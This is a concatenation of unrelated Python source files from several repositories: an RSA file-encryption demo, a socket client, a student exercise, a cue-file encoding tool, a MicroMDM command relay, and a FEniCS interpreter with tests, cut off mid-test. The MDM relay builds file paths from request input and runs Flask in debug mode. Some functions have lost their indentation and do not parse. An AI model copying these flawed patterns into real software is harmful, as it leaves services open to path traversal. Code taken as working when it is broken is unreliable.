        # NoEncryption(), so no passphrase applies.  The original line held
        # the redaction placeholder `password=<PASSWORD>`, which is not
        # valid Python.
        private_key = serialization.load_pem_private_key(
            key_file.read(),
            password=None,
            backend=default_backend()
        )
    with open("public_key.pem", "rb") as key_file:
        public_key = serialization.load_pem_public_key(
            key_file.read(),
            backend=default_backend()
        )
    return private_key, public_key
def create_keys():
    """Generate a fresh 4096-bit RSA key pair; return (private_key, public_key)."""
    private = rsa.generate_private_key(
        public_exponent=65537,
        key_size=4096,
        backend=default_backend(),
    )
    return private, private.public_key()
def encrypt_message(public_key, message):
    """RSA/OAEP-encrypt *message* (bytes) with *public_key*; return ciphertext bytes."""
    oaep = padding.OAEP(
        mgf=padding.MGF1(algorithm=hashes.SHA256()),
        algorithm=hashes.SHA512(),
        label=None,
    )
    return public_key.encrypt(message, oaep)
def decrypt_message(private_key, message):
    """RSA/OAEP-decrypt *message* (ciphertext bytes) with *private_key*."""
    oaep = padding.OAEP(
        mgf=padding.MGF1(algorithm=hashes.SHA256()),
        algorithm=hashes.SHA512(),
        label=None,
    )
    return private_key.decrypt(message, oaep)
def encrypt_file(key, file):
    """Encrypt *file* chunk-by-chunk with the public *key*; write ``file + '.enc'``.

    Each 256-byte chunk is base64-encoded before RSA/OAEP encryption,
    which keeps it within the OAEP plaintext limit of the 4096-bit keys
    produced by create_keys.
    """
    chunk_size = 256
    pieces = []
    with open(file, "rb") as source:
        while True:
            block = source.read(chunk_size)
            if not block:
                break
            pieces.append(encrypt_message(key, base64.b64encode(block)))
    with open(file + '.enc', 'wb') as target:
        target.write(b''.join(pieces))
def decrypt_file(key, file):
    """Decrypt a file produced by encrypt_file; write ``file + '.original'``.

    Two fixes versus the original:
    * each RSA/OAEP ciphertext block is key_size/8 bytes long (512 bytes
      for the 4096-bit keys from create_keys), so reading 256-byte chunks
      split every block in half and decryption could never succeed;
    * encrypt_file base64-encodes the plaintext before encrypting, so the
      decrypted data must be base64-decoded to recover the original bytes.
    """
    original_file = bytes()
    chunk = key.key_size // 8  # one full RSA ciphertext block per read
    with open(file, "rb") as f:
        while True:
            data = f.read(chunk)
            if data:
                original_file += base64.b64decode(decrypt_message(key, data))
            else:
                break
    with open(file + '.original', 'wb') as f:
        f.write(original_file)
def main():
    """Demo: generate and persist an RSA key pair, then round-trip one user message."""
    private_key, public_key = create_keys()
    write_keys_on_disk(private_key, public_key)
    print(f'[+] Simple RSA Encryption/Decryption [+]')
    message = input(' | \t[X] Message to encrypt: ').encode()
    encrypted_message = encrypt_message(public_key, message)
    decrypted_message = decrypt_message(private_key, encrypted_message)
    print(f' | \t | Message: {message}')
    # Only a prefix of the ciphertext is shown; the full block is 512 bytes.
    print(f' | \t | Encrypted message: {encrypted_message[:25]}')
    print(f' | \t | Decrypted message: {decrypted_message}')
    print(' | \t[X] -------------------------- [X]')
    print(f'[+] ------------------------------- [+]')


if __name__ == '__main__':
    main()
|
dggsoares/Simple_Python_Exercises | samples/client_socketserver.py | import socket
from threading import Thread
import random
import string
import base64
ADDRESS = ('172.16.58.3', 30001)
def gera_lixo():
    """Return 20 random letters/punctuation characters, base64-encoded, as str."""
    alphabet = string.ascii_letters + string.punctuation
    picked = ''.join(random.choice(alphabet) for _ in range(20))
    return base64.b64encode(picked.encode()).decode()
class ClientThread(Thread):
    """One TCP client that sends a random payload and prints the echoed reply.

    Bug fixed: ``run`` previously declared ``client_id`` where ``self``
    belongs, so the "client id" it printed was the thread object itself.
    ``run`` now takes ``self`` and uses an explicit id (or the thread's
    name) instead. ``ClientThread()`` with no arguments keeps working.
    """

    def __init__(self, client_id=None):
        # client_id is optional for backward compatibility with ClientThread().
        Thread.__init__(self)
        self.client_id = client_id

    def run(self):
        client_id = self.client_id if self.client_id is not None else self.name
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(ADDRESS)
        message = f'\n\tClient: {client_id} \n\tMESSAGE: {gera_lixo()}'
        s.send(message.encode())
        response = s.recv(2048).decode()
        print('--------------------------------------')
        print(f'Client {client_id}')
        print(f'SENT: {message}')
        print(f'RECV: {response}')
        print('--------------------------------------')
# Launch 10 concurrent clients against the echo server and wait for all to finish.
if __name__ == '__main__':
    clients_threads = []
    for i in range(10):
        client = ClientThread()
        client.start()
        clients_threads.append(client)
    for t in clients_threads:
        t.join()
cs-fullstack-2019-spring/python-arraycollections-cw-ChelseaW | Problem1.py | def main():
# problem1()
# problem2()
# problem3()
# problem4()
problem5()
# Create a function with the variable below. After you create the variable do the instructions below that.
#
# arrayForProblem2 = ["Kenn", "Kevin", "Erin", "Meka"]
# a) Print the 3rd element of the numberList.
#
# b) Print the size of the array
#
# c) Delete the second element.
#
# d) Print the 3rd element.
# Function is printing size and removing element from the array
# def problem1():
#
# arrayForProblem2 = ["Kenn", "Kevin", "Erin", "Meka"]
# print(arrayForProblem2[3])
# print(len(arrayForProblem2))
# arrayForProblem2.remove(2)
# print(arrayForProblem2[3])
# Create a function that has a loop that quits with ‘q’. If the user doesn't enter 'q', ask them to input another string.
# def problem2():
# creator = ""
# while creator != 'q':
# creator = input("Something weird")
# print(creator)
# Create a function that contains a collection of information for the following. After you create the collection do the instructions below that.
#
# Jonathan/John
# Michael/Mike
# William/Bill
# Robert/Rob
# a) Print the collection
#
# b) Print William's nickname
# def problem3():
#
# theCrew = {
# "Jonathan": " John",
# "Michael":" Mike",
# "William":"Bill",
# "Robert":"Rob"
# }
# print(theCrew)
# print(theCrew["William"])
# Create an array of 5 numbers. Using a loop, print the elements in the array reverse order. Do not use a function
# def problem4():
#
#
# digits = [20,12,19,69,88]
# for eachElement in range(len(digits)-1,-1,-1):
# print(digits[eachElement])
# for eachEl in range(0, len(digits)-1, 1)
# range(0,5) = [0,1,2,3,4]
# for eachEl in range():
# print(digits[eachEl])
# for digits in range(-88,11):
# reversed(digits)
# digits -+1
# print(digits)
# Create a function that will have a hard coded array then ask the user for a number.
# Use the userInput to state how many numbers in an array are higher, lower, or equal to it.
def problem5(user_number=None):
    """Compare a hard-coded list against a number supplied by the user.

    Exercise spec (from the comment above): hard-code an array, ask the
    user for a number, then state how many entries in the array are
    higher than, lower than, or equal to it. The original body did not
    parse (stray ``:`` after the list literal, bare ``+=1``, undefined
    ``fourCount``/``fiveCount``, iterating a string as a callable).

    ``user_number`` may be passed directly for testing; when omitted the
    user is prompted, as the exercise requires.

    Returns (lower, equal, higher) counts.
    """
    list_of_digits = [1, 2, 3, 4, 5]
    if user_number is None:
        user_number = int(input("Give a number"))
    lower = sum(1 for value in list_of_digits if value < user_number)
    equal = sum(1 for value in list_of_digits if value == user_number)
    higher = sum(1 for value in list_of_digits if value > user_number)
    print(f"Lower: {lower}")
    print(f"Equal: {equal}")
    print(f"Higher: {higher}")
    return lower, equal, higher
# Script entry point.
if __name__ == '__main__':
    main()
sandomingo/cow | cow.py | #!/usr/local/bin/python
# encoding=utf-8
import sys
import codecs
import chardet
import re
def read_then_write(in_file, guess_encoding, out_encoding):
    """Transcode in_file from guess_encoding to out_encoding (Python 2).

    The converted text is written next to the input as
    ``name(<out_encoding>).ext``. Lines that fail to decode or encode are
    skipped silently, preserving the original best-effort behaviour.

    Fixes: both file handles are now closed via ``with`` (they leaked
    before), and the non-standard open mode ``'rw'`` -- which Python 2
    treated as plain read -- is replaced with an explicit ``'r'``.
    """
    dot_pos = in_file.rfind('.')
    output_file = in_file[0:dot_pos] + '(%s)' % out_encoding + in_file[dot_pos:]
    with open(in_file, 'r') as reader, open(output_file, 'wb') as writer:
        for line in reader:
            try:
                line = codecs.decode(line, guess_encoding)
                writer.write(codecs.encode(line, out_encoding))
            except Exception:
                # Best effort: skip lines that cannot be transcoded.
                pass
def extract_info(info_file):
"""
Extract album title, performer and song names from the given album info. file
:param info_file:
:return: (title, performer, [(no, song1), (no, song2), ...])
"""
reader = open(info_file, 'rw')
confidence, guess_encoding = detect(info_file)
songs = []
has_title = False
has_performer = False
for line in reader:
line = line.strip()
try:
line = codecs.decode(line, guess_encoding)
if not has_title and (line.startswith(u"专辑名称:") or line.startswith(u"唱片名称:")):
title = line[5:]
has_title = True
elif not has_performer and line.startswith(u"歌手:"):
performer = line[3:]
has_performer = True
elif not has_performer and line.startswith(u"歌手组合:"):
performer = line[5:]
has_performer = True
elif re.match("^\d\d .+", line):
pos = line.index(' ')
no = line[:pos]
name = line[pos+1:]
songs.append((no, name))
except Exception as e:
print 'Exception: err while process line: ' + line
reader.close()
return title, performer, songs
def rebuild(in_file, info_file):
    """
    Rebuild the cue file with the given album info file.

    Placeholder strings left by the ripper ("unknown title"/"unknown
    artist" in Chinese, and TrackNN names) are replaced using the data
    parsed from info_file; the result is written next to in_file as
    ``name(utf-8).ext``.
    """
    out_encoding = 'utf-8'
    title, performer, songs = extract_info(info_file)
    album_cue = read_file_as_string(in_file)
    # put on title
    album_cue = album_cue.replace(u"\"未知标题\"", "\"" + title + "\"")
    # put on performer
    album_cue = album_cue.replace(u"\"未知艺术家\"", "\"" + performer + "\"")
    # put on all songs' names
    for song_name in songs:
        no, name = song_name
        # e.g. "Track01" -> the real song name
        old_name = "Track" + str(no)
        album_cue = album_cue.replace(old_name, name)
    dot_pos = in_file.rfind('.')
    output_file = in_file[0:dot_pos] + '(%s)' % out_encoding + in_file[dot_pos:]
    writer = open(output_file, 'wb')
    encoded_line = codecs.encode(album_cue, out_encoding)
    writer.write(encoded_line)
    writer.close()
def read_file_as_string(in_file):
    """Read in_file, decoding with its detected encoding; return one string.

    Fixes: the handle is now closed via ``with`` (it leaked before) and
    the non-standard open mode ``'rw'`` is replaced with ``'r'``.
    """
    confidence, guess_encoding = detect(in_file)
    text = []
    with open(in_file, 'r') as reader:
        for line in reader:
            text.append(codecs.decode(line, guess_encoding))
    return ''.join(text)
def convert(in_file, out_encoding):
    # Detect in_file's encoding, then transcode it to out_encoding
    # (output goes to "name(<out_encoding>).ext"). Python 2 print statement.
    confidence, guess_encoding = detect(in_file)
    read_then_write(in_file, guess_encoding, out_encoding)
    print 'Convert from %s to %s Completed (with a confidence of %.2f%%)!' \
        % (guess_encoding, out_encoding, confidence)
def detect(in_file):
    """Guess the character encoding of in_file using chardet.

    Returns (confidence_percent, encoding_name).
    """
    with open(in_file, 'rb') as handle:
        guess = chardet.detect(handle.read())
    return float(guess['confidence']) * 100, guess['encoding']
def print_usage():
    # Command-line help (Python 2 print statements; trailing text is Chinese).
    print 'Usage: '
    print ' python cow.py [detect/convert] input_file [output_encoding(default: utf-8)] 检测/转换文件到指定编码'
    print ' python cow.py rebuild cue_file album_info_file 使用专辑信息补全cue文件信息'
# CLI entry point: dispatch on the action argument (Python 2).
if __name__ == '__main__':
    arg_num = len(sys.argv)
    if arg_num > 2:
        a_type = sys.argv[1]
        input_file = sys.argv[2]
        output_encoding = 'utf-8'  # default when not given on the command line
        if a_type == 'detect':
            g_confidence, g_encoding = detect(input_file)
            print 'Guess encoding: %s (with a confidence of %.2f%%).' % (g_encoding, g_confidence)
        elif a_type == 'convert':
            if arg_num > 3:
                output_encoding = sys.argv[3]
            convert(input_file, output_encoding)
        elif a_type == 'rebuild':
            album_info_file = sys.argv[3]
            rebuild(input_file, album_info_file)
    # NOTE(review): original indentation was lost; this else is attached to the
    # argument-count check so too few arguments print the usage text.
    else:
        print_usage()
|
munkimdm/munkimdm | env.py | settings = {
'micromdm_url': 'https://micromdm.domain.com',
'micromdm_key': 'SUPER_SECRET_API_KEY',
'basic_auth_user': 'MIDDLEWARE_USERNAME_IN_MUNKI_PKGINFO',
'basic_auth_password': '<PASSWORD>',
'configurl': 'https://vpp.itunes.apple.com/mdm/VPPClientConfigSrv',
'licensesurl': 'https://vpp.itunes.apple.com/mdm/getVPPLicensesSrv',
'assetsurl': 'https://vpp.itunes.apple.com/mdm/getVPPAssetsSrv',
'manageurl': 'https://vpp.itunes.apple.com/mdm/manageVPPLicensesByAdamIdSrv',
'sToken':'<PASSWORD>AB<PASSWORD>'
}
|
munkimdm/munkimdm | munkimdm/munkimdm.py | #!/usr/bin/env python3
from flask import Flask, request
import base64
import requests
from env import settings
from flask_basicauth import BasicAuth
application = Flask(__name__)
application.config["BASIC_AUTH_USERNAME"] = settings.get("basic_auth_user")
application.config["BASIC_AUTH_PASSWORD"] = settings.get("basic_auth_password")
basic_auth = BasicAuth(application)
# MDM commands this relay is willing to forward to MicroMDM.
supported_commands = [
    "RestartDevice",
    "InstallProfile",
    "RemoveProfile",
    "ShutDownDevice",
]
@application.route("/api/<command>", methods=["GET", "POST"])
@basic_auth.required
def api(command):
    """Relay a supported MDM command from the request JSON to MicroMDM.

    The JSON body must contain ``udid`` plus any command-specific keys;
    ``profile`` names a mobileconfig file in the munki repo that gets
    base64-embedded into the payload for InstallProfile.
    """
    if command not in supported_commands:
        return "Command %s not valid.\n" % command
    content = request.json

    payload = {"request_type": command}

    def check(arg):
        # Copy an optional key from the request body into the MicroMDM payload.
        if arg in content:
            payload[arg] = content[arg]

    check("udid")
    check("pin")  # For DeviceLock
    check("product_key")  # For ScheduleOSUpdate
    check("install_action")  # For ScheduleOSUpdateScan
    check("force")  # For ScheduleOSUpdateScan
    check("identifier")  # For RemoveProfile
    if "profile" in content:  # For InstallProfile
        profile = "/path_to/munki_repo/pkgs/profiles/%s" % content["profile"]
        with open(profile, "rb") as f:
            profile_bytes = f.read()  # renamed: previously shadowed builtin 'bytes'
        payload["Payload"] = base64.b64encode(profile_bytes).decode("ascii")
    # NOTE(review): the MicroMDM response is deliberately not inspected; this
    # endpoint only reports that the command was issued.
    requests.post(
        "{}/v1/commands".format(settings.get("micromdm_url")),
        auth=("micromdm", settings.get("micromdm_key")),
        json=payload,
    )
    return "Issuing %s: Success! \n" % command
if __name__ == "__main__":
    # Development server only; run behind a real WSGI server in production.
    application.run(debug=True)
|
munkimdm/munkimdm | mdmauth.py | <filename>mdmauth.py<gh_stars>1-10
import requests
from flask_basicauth import BasicAuth
from nested_lookup import get_occurrence_of_value
from flask import Flask, request
from env import settings
app = Flask(__name__)
app.config['BASIC_AUTH_USERNAME'] = settings.get('basic_auth_user')
app.config['BASIC_AUTH_PASSWORD'] = settings.get('basic_auth_password')
basic_auth = BasicAuth(app)
# MDM commands this relay will forward to MicroMDM (superset of munkimdm.py's list).
supported_commands = ['InstallApplication', 'InstallEnterpriseApplication', 'InstallProfile', 'RemoveProfile', 'EnableRemoteDesktop', 'DisableRemoteDesktop', 'SetFirmwarePassword', 'VerifyFirmwarePassword', 'RestartDevice', 'ShutDownDevice']
@app.route('/api/<command>', methods=['GET', 'POST'])
@basic_auth.required
def api(command):
    """Relay a supported MDM command to MicroMDM, handling VPP licensing.

    For InstallApplication the device serial is checked against the VPP
    license list first and the app is assigned to the serial if needed.

    Fix: the success response now reports only the command name. It
    previously interpolated the whole payload, echoing udids and firmware
    passwords back to the caller (the sibling munkimdm.py returns the
    command name).
    """
    if command not in supported_commands:
        return 'Command %s not valid.\n' % command
    content = request.json

    payload = {
        'request_type': command
    }

    def check(arg):
        # Copy an optional key from the request body into the payload.
        if arg in content:
            payload[arg] = content[arg]

    def check_int(arg):
        # Same as check(), but coerce the value to int.
        if arg in content:
            payload[arg] = int(content[arg])

    check('udid')
    check('currentpassword')  # For SetFirmwarePassword
    check('newpassword')  # For SetFirmwarePassword
    check('password')  # For VerifyFirmwarePassword
    check('pin')  # For DeviceLock
    check('product_key')  # For ScheduleOSUpdate
    check('install_action')  # For ScheduleOSUpdateScan
    check('force')  # For ScheduleOSUpdateScan
    check('payload')  # For InstallProfile
    check('identifier')  # For RemoveProfile
    check('manifest_url')  # For InstallEnterpriseApplication
    check('serial')  # For InstallVPPApplication
    check_int('itunes_store_id')  # For InstallVPPApplication
    if 'InstallApplication' in command:
        options = {}
        options['purchase_method'] = int(1)
        payload['options'] = options
        # Get List of Licenses associated with Serial
        params = dict(
            sToken=settings.get('sToken'),
            serialNumber=content['serial']
        )
        # NOTE(review): Apple's VPP service expects the JSON body even on GET.
        resp = requests.get(url=settings.get('licensesurl'), json=params)
        data = resp.json()
        # NOTE(review): these prints go to the server log and may contain the
        # sToken -- consider removing/redacting in production.
        print(data)
        if get_occurrence_of_value(data, value=content['itunes_store_id']) == 0:
            # Assign this to this serial number
            print("Not assigned to this serial, doing so now")
            params = dict(
                sToken=settings.get('sToken'),
                associateSerialNumbers=[content['serial']],
                pricingParam="STDQ",
                adamIdStr=content['itunes_store_id']
            )
            print(requests.post(url=settings.get('manageurl'), json=params))
            print(params)
    requests.post(
        '{}/v1/commands'.format(settings.get('micromdm_url')),
        auth=('micromdm', settings.get('micromdm_key')),
        json=payload
    )
    return 'Issuing %s: Success! \n' % command
if __name__ == '__main__':
    # Development server; binds all interfaces with debug enabled.
    app.run(debug=True, host='0.0.0.0')
|
MiroK/fenics-cacl | xcalc/interpreter.py | <filename>xcalc/interpreter.py
from ufl.corealg.traversal import traverse_unique_terminals
from ufl.conditional import (LT, GT, LE, GE, EQ, NE, AndCondition, OrCondition,
NotCondition)
from dolfin import (Function, VectorFunctionSpace, interpolate, Expression,
as_vector, Constant, as_matrix)
import numpy as np
import ufl
from itertools import imap, repeat, izip
import operator
import timeseries
import operators
from clement import clement_interpolate
from utils import *
def Eval(expr):
    '''
    Collapse ``expr`` -- a subset of UFL over functions f, g in a space V --
    into a Function in V (coefficients op(coefs(f), coefs(g))) or a number.
    Thin public wrapper around Interpreter.eval.
    '''
    return Interpreter.eval(expr)
class Interpreter(object):
    '''
    This interpreter translates expr into a function object or a number. Expr is
    defined via a subset of UFL language. Letting f, g be functions in V
    Eval(op(f, g)) is a function in V with coefs given by (op(coefs(f), coef(g))).
    '''
    # Expressions which when evaluated end up in the same space as the arguments
    # or require no reshaping of arrays before numpy is applied
    no_reshape_type = {
        ufl.algebra.Sum: np.add,
        ufl.algebra.Abs: np.abs,
        ufl.algebra.Division: np.divide,
        ufl.algebra.Product: np.multiply,
        ufl.algebra.Power: np.power,
        ufl.mathfunctions.Sin: np.sin,
        ufl.mathfunctions.Cos: np.cos,
        ufl.mathfunctions.Sqrt: np.sqrt,
        ufl.mathfunctions.Exp: np.exp,
        ufl.mathfunctions.Ln: np.log,
        ufl.mathfunctions.Tan: np.tan,
        ufl.mathfunctions.Sinh: np.sinh,
        ufl.mathfunctions.Cosh: np.cosh,
        ufl.mathfunctions.Tanh: np.tanh,
        ufl.mathfunctions.Asin: np.arcsin,
        ufl.mathfunctions.Acos: np.arccos,
        ufl.mathfunctions.Atan: np.arctan,
        ufl.mathfunctions.Atan2: np.arctan2,
        ufl.operators.MinValue: np.minimum,
        ufl.operators.MaxValue: np.maximum,
        # Comparisons/logicals evaluate to 0./1. indicator arrays
        LT: lambda x, y: np.array(x < y, dtype=float),
        GT: lambda x, y: np.array(x > y, dtype=float),
        LE: lambda x, y: np.array(x <= y, dtype=float),
        GE: lambda x, y: np.array(x >= y, dtype=float),
        EQ: lambda x, y: np.array(x == y, dtype=float),
        NE: lambda x, y: np.array(x != y, dtype=float),
        AndCondition: lambda x, y: np.array(np.logical_and(x, y), dtype=float),
        OrCondition: lambda x, y: np.array(np.logical_or(x, y), dtype=float),
        NotCondition: lambda x: np.array(np.logical_not(x), dtype=float),
        ufl.operators.Conditional: lambda pred, true, false: np.where(pred, true, false)
    }

    # Expressions which when evaluated end up in general in different space than
    # the arguments/require manipulations before numpy is applied
    reshape_type = {
        ufl.tensoralgebra.Inverse: np.linalg.inv,
        ufl.tensoralgebra.Transposed: np.transpose,
        ufl.tensoralgebra.Sym: lambda A: 0.5*(A + A.T),
        ufl.tensoralgebra.Skew: lambda A: 0.5*(A - A.T),
        ufl.tensoralgebra.Deviatoric: lambda A: A - np.trace(A)*np.eye(len(A))*(1./len(A)),
        ufl.tensoralgebra.Cofactor: lambda A: np.linalg.det(A)*(np.linalg.inv(A)).T,
        ufl.tensoralgebra.Determinant: np.linalg.det,
        ufl.tensoralgebra.Trace: np.trace,
        ufl.tensoralgebra.Dot: np.dot,
        ufl.tensoralgebra.Cross: np.cross,
        ufl.tensoralgebra.Outer: np.outer,
        ufl.tensoralgebra.Inner: np.inner,
        ufl.tensors.ListTensor: lambda *x: np.hstack(x)
    }
    # FIXME: ListTensor(foo, indices=None) <= we have no support for indices

    # Nodes to be handled by Clement interpolation
    diff_type = (ufl.differentiation.Grad,
                 ufl.differentiation.Div,
                 ufl.differentiation.Curl,
                 ufl.differentiation.NablaGrad,
                 ufl.differentiation.NablaDiv)

    # Others where Eval works
    terminal_type = (Function, int, float)
    value_type = (ufl.algebra.ScalarValue, ufl.algebra.IntValue)
    index_type = (ufl.indexed.Indexed, )
    compose_type = (ufl.tensors.ComponentTensor, )

    @staticmethod
    def eval(expr):
        """Recursively collapse a UFL expression into a Function or a number."""
        # Guys with their own logic for collapsing into functions.
        # Okay, we combine 2 design patterns: LazyNodes do it themselves,
        # series rely on the interpreter.
        if isinstance(expr, operators.LazyNode):
            return expr.evaluate()
        # For series we eval each node and make a series of functions
        # NOTE: intercept here because TempSeries is a terminal type
        if isinstance(expr, timeseries.TempSeries):
            return timeseries.TempSeries(zip(map(Interpreter.eval, expr), expr.times))
        # Terminals/base cases (also TempSeries) -> identity
        if isinstance(expr, Interpreter.terminal_type): return expr
        # To number
        if isinstance(expr, Interpreter.value_type): return expr.value()
        # To number
        if isinstance(expr, Constant): return float(expr)
        # To number
        if isinstance(expr, ufl.constantvalue.Zero): return 0
        # Recast spatial coordinate as CG1 functions
        if isinstance(expr, ufl.geometry.SpatialCoordinate):
            mesh = expr.ufl_domain().ufl_cargo()
            r = Expression(('x[0]', 'x[1]', 'x[2]')[:mesh.geometry().dim()], degree=1)
            return interpolate(r, VectorFunctionSpace(mesh, 'CG', 1))
        # Okay: now we have expr with arguments. If this expression involves
        # time series then all the non-number arguments should be compatible
        # time series (Python 2: filter/map return lists here).
        terminals = filter(lambda t: isinstance(t, Function), traverse_unique_terminals(expr))
        # Don't mix functions and series terminals
        series = filter(lambda t: isinstance(t, timeseries.TempSeries), terminals)
        assert len(series) == len(terminals) or len(series) == 0, map(type, terminals)
        # For series, we apply op to functions and make new series
        if series:
            return series_rule(expr)

        expr_type = type(expr)
        # Require reshaping and all args are functions
        if expr_type in Interpreter.reshape_type:
            return numpy_reshaped(expr, op=Interpreter.reshape_type[expr_type])
        # Clement (derivatives leave the space, so interpolate instead)
        if expr_type in Interpreter.diff_type:
            # NOTE: Clement is its own thing - it does not use this interpreter
            # for subexpression evaluation
            return clement_interpolate(expr)
        # Define tensor by components
        if isinstance(expr, Interpreter.compose_type):
            return component_tensor_rule(expr)
        # A indexed by FixedIndex or Index
        if isinstance(expr, Interpreter.index_type):
            return indexed_rule(expr)
        # No reshaping needed
        op = Interpreter.no_reshape_type[expr_type]  # Throw if we don't support this
        args = map(Interpreter.eval, expr.ufl_operands)
        # Manipulate coefs of arguments to get coefs of the expression
        coefs = map(coefs_of, args)
        V_coefs = op(*coefs)
        # Make that function
        V = space_of(args)
        return make_function(V, V_coefs)
def numpy_reshaped(expr, op):
    '''Get the coefs by applying the numpy op to reshaped argument coefficients'''
    args = map(Interpreter.eval, expr.ufl_operands)
    # Scalar inner/dot products are an exception: they collapse to a product
    if isinstance(expr, (ufl.tensoralgebra.Inner, ufl.tensoralgebra.Dot)) \
       and all(arg.ufl_shape == () for arg in args):
        return Interpreter.eval(args[0]*args[1])
    # Otherwise apply op to the reshaped args; result has expr's shape
    return numpy_op_foo(args, op=op, shape_res=expr.ufl_shape)
def indexed_rule(expr):
    '''Function representing f[index] so we end up with scalar'''
    shape_res = expr.ufl_shape
    assert isinstance(expr, ufl.indexed.Indexed)
    f, index = expr.ufl_operands
    # What to index
    f = Interpreter.eval(f)
    # How to index: fixed indices become ints, free ones full slices
    shape = f.ufl_shape
    indices = tuple(int(index) if isinstance(index, ufl.indexed.FixedIndex) else slice(l)
                    for l, index in zip(shape, index.indices()))
    # This could be implemented more efficiently (see earlier commits).
    # However, below is the nicer idea that op is just a getitem.
    op = lambda A, i=indices: A[i]
    return numpy_op_foo((f, ), op=op, shape_res=shape_res)
def series_rule(expr):
    '''Eval expression where the terminals are time series'''
    foos = filter(lambda f: isinstance(f, Function), traverse_unique_terminals(expr))
    # Make first sure that the series are compatible in the sense of having
    # the same time interval
    times = timeseries.common_interval(foos)
    assert len(times)
    # Compatibility of spaces (raises if the subelements differ)
    common_sub_element([f.function_space() for f in foos])

    # The idea now is to propagate the expression, by which I mean that
    # we grow the expr using nodes in the series.
    # NOTE(review): Python 2 only -- uses the removed builtins apply/izip.
    def unpack(expr):
        '''expr -> iterable of expr'''
        # Rebuild one node of expr per time step from the expanded operands
        return (apply(type(expr), sum(args, ())) for args in expand(expr.ufl_operands))

    def expand(operands):
        # For each operand produce a per-time-step stream of 1-tuples
        iterators = []
        for o in operands:
            if isinstance(o, timeseries.TempSeries):
                iterators.append(((f, ) for f in o))
            # Nonseries terminal: repeat it for every time step
            elif not o.ufl_operands:
                iterators.append(((f, ) for f in repeat(o)))
            # An expression: recurse
            else:
                iterators.append(((f, ) for f in unpack(o)))
        return izip(*iterators)

    nodes = unpack(expr)
    # A series of new nodes -> series of functions
    return Interpreter.eval(timeseries.TempSeries(zip(nodes, times)))
def component_tensor_rule(expr):
    '''Tensors whose components are given by computation of some sort.'''
    f, free_indices = expr.ufl_operands
    # Want to build vectors or matrices
    assert len(free_indices) == 1 or len(free_indices) == 2
    # NOTE(review): `replace` and `FixedIndex` come from `from utils import *`
    # at the top of the file -- confirm against utils.
    # Simple rules where the eval node is obtained just by substitution
    if not isinstance(f, ufl.indexsum.IndexSum):
        # Vector from 2*Constant((1, 2))
        if len(free_indices) == 1:
            index = free_indices[0]
            f = tuple(replace(f, index, FixedIndex(i)) for i in range(expr.ufl_shape[0]))
            return Interpreter.eval(as_vector(f))
        # Matrix from 2*Constant(((1, 2), (3, 4)))
        if len(free_indices) == 2:
            mat = []
            for i in range(expr.ufl_shape[0]):
                f_i = replace(f, free_indices[0], FixedIndex(i))
                row = []
                for j in range(expr.ufl_shape[1]):
                    row.append(replace(f_i, free_indices[1], FixedIndex(j)))
                mat.append(row)
            return Interpreter.eval(as_matrix(mat))
    # The idea now is to build the expression which represents the sum
    # needed to compute the component, i.e. explicit transformation of the
    # IndexSum node. Computing with scalars this way is not very efficient ->
    # FIXME: drop to numpy?
    assert isinstance(f, ufl.indexsum.IndexSum)
    summand, sum_indices = f.ufl_operands
    assert len(sum_indices) == 1  # FIXME: is this necessary
    # Be explicit about the sum - leave free indices to be filled
    # in by each component
    sum_expr = sum(replace(summand, sum_indices[0], FixedIndex(j))
                   for j in range(f.dimension()))
    # Now build the components
    if len(free_indices) == 1:
        # Sub for the free_i
        expr = as_vector(tuple(replace(sum_expr, free_indices[0], FixedIndex(i))
                               for i in range(f.ufl_index_dimensions[0])))
        return Interpreter.eval(expr)
    mat = []
    for i in range(f.ufl_index_dimensions[0]):
        # Sub i
        sub_i = replace(sum_expr, free_indices[0], FixedIndex(i))
        row = []
        for j in range(f.ufl_index_dimensions[1]):
            # Sub j
            row.append(replace(sub_i, free_indices[1], FixedIndex(j)))
        mat.append(row)
    expr = as_matrix(mat)
    return Interpreter.eval(expr)
|
MiroK/fenics-cacl | test/test_operators.py | from xcalc.interpreter import Eval
from xcalc.timeseries import TempSeries
from xcalc.operators import (Eigw, Eigv, Mean, RMS, STD, SlidingWindowFilter,
Minimum, Maximum)
from dolfin import *
import numpy as np
import unittest
def error(true, me):
    """L2 distance between `me` and `true`, integrated over `me`'s mesh."""
    domain = me.function_space().mesh()
    diff = me - true
    return sqrt(abs(assemble(inner(diff, diff)*dx(domain=domain))))
class TestCases(unittest.TestCase):
    '''UnitTest for (some of) the operators.

    Each test builds a small dolfin function, applies a lazy operator,
    Evals it, and compares against the numpy/closed-form answer.
    '''
    def test_eigw(self):
        # FIXME: more advanced cases
        A = np.array([[1, -2], [-3, 1]])

        mesh = UnitSquareMesh(10, 10)
        V = TensorFunctionSpace(mesh, 'DG', 0)
        f = interpolate(Constant(A), V)

        me = Eval(Eigw(f+f))  # Eval o Declared
        true = Constant(np.linalg.eigvals(A+A))
        self.assertTrue(error(true, me) < 1E-14)

    def test_eigv(self):
        A = np.array([[1, -2], [-3, 1]])

        mesh = UnitSquareMesh(10, 10)
        V = TensorFunctionSpace(mesh, 'DG', 0)
        f = interpolate(Constant(A), V)

        # FIXME: 2*f leads to ComponentTensor which we don't handle well
        me = Eval(Eigv(f))
        # np.linalg.eig returns eigenvectors as columns; rows are compared here
        true = Constant((np.linalg.eig(A)[1]).T)
        self.assertTrue(error(true, me) < 1E-14)

    def test_mean(self):
        mesh = UnitSquareMesh(2, 2)
        V = FunctionSpace(mesh, 'CG', 1)
        f = Expression('(x[0]+x[1])*t', t=0, degree=1)

        ft_pairs = []
        for t in (0, 0.1, 0.4, 0.6, 2.0):
            f.t = t
            v = interpolate(f, V)
            ft_pairs.append((v, t))

        mean = Eval(Mean(TempSeries(ft_pairs)))  # Eval o Declared
        # Time-mean of t over [0, 2] is 1
        f.t = 1.0
        self.assertTrue(error(f, mean) < 1E-14)

    def test_rms(self):
        mesh = UnitSquareMesh(4, 4)
        V = FunctionSpace(mesh, 'CG', 1)
        f = Expression('(x[0]+x[1])*t', t=0, degree=1)

        ft_pairs = []
        for t in np.linspace(0, 2, 80):
            f.t = t
            v = interpolate(f, V)
            ft_pairs.append((v, t))

        rms = Eval(RMS(TempSeries(ft_pairs)))
        f.t = sqrt(4/3.)
        # Due to quadrature error
        self.assertTrue(error(f, rms) < 1E-4)

    def test_std(self):
        mesh = UnitSquareMesh(4, 4)
        V = FunctionSpace(mesh, 'CG', 1)
        f = Expression('(x[0]+x[1])*t', t=0, degree=1)

        ft_pairs = []
        for t in np.linspace(0, 2, 80):
